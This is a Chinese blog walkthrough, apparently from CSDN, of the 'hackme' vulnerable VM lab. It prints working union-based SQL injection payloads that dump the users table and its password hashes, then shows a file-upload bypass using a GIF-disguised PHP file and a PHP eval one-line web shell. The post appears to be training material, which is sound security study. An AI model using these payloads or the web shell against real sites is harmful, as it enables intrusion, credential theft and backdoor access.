靶场实况hackme

这是一个vm靶场文件,文件包含漏洞

不必说vm安装靶场

出现此界面即可以访问了

首先,

查看在虚拟网络编辑器中查看靶机虚拟网卡网段

然后对端口进行爆破并访问,端口扫80

总之先建个账号看看

ps:123456

直接点查找

可以查到所有书名,然后漏洞挨个试一试

输入一个书名+sql注入的语法

IoT Exploitation' and 1=1 -- -

发现存在sql注入

order by判断3回显4不回显

' union select 1,2,3-- -

联合查询判断回显

sql内置库查询一套

库名webapphacking

表名

' union select group_concat(table_name),database(),3 from information_schema.tables where table_schema='webapphacking'-- -

books,users

显然,我们要用users这个看看列

' union select group_concat(column_name),database(),3 from information_schema.columns where table_schema='webapphacking' and table_name='users'-- -

id,user,pasword,name,address

看看user和pasword

' union select group_concat(0x7e,user,0x7e,pasword,0x7e),database(),3 from users-- -

~user1~5d41402abc4b2a76b9719d911017c592~,~user2~6269c4f71a55b24bad0f0267d9be5508~,~user3~0f359740bd1cda994f8b55330c86d845~,~test~05a671c66aefea124cc08b76ea6d30bb~,~superadmin~2386acb2cf356944177746fc92523983~,~test1~05a671c66aefea124cc08b76ea6d30bb~,~123456~e10adc3949ba59abbe56e057f20f883e~在这些数据里显然superadmin十分显眼,我们登录一下看一看,后面的扔到md5解码一下,一般来说密码都是这个加密的

登陆一下振奋人心的消息,页面不一样了,想想我们应该怎么做

我根据提示上传了一个1.jpg,这个图片是我之前做的错误图片

去他说的uploads folder看一看,这个功能是正常的

然后传一个正常图片,也能显示

这次我们传一个带php的图片,具体怎么传,看看upload-labs靶场的教学

GIF89a<?php phpinfo();?>,这是一个伪装成gif的php文件,把他传上去看一看

显然,这种方式是可以的

我们来一个php一句话木马<?php @eval($_POST['hackme']);?>

然后小编在这里怎么也链接不成功,就先到这里吧,以后再说

  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值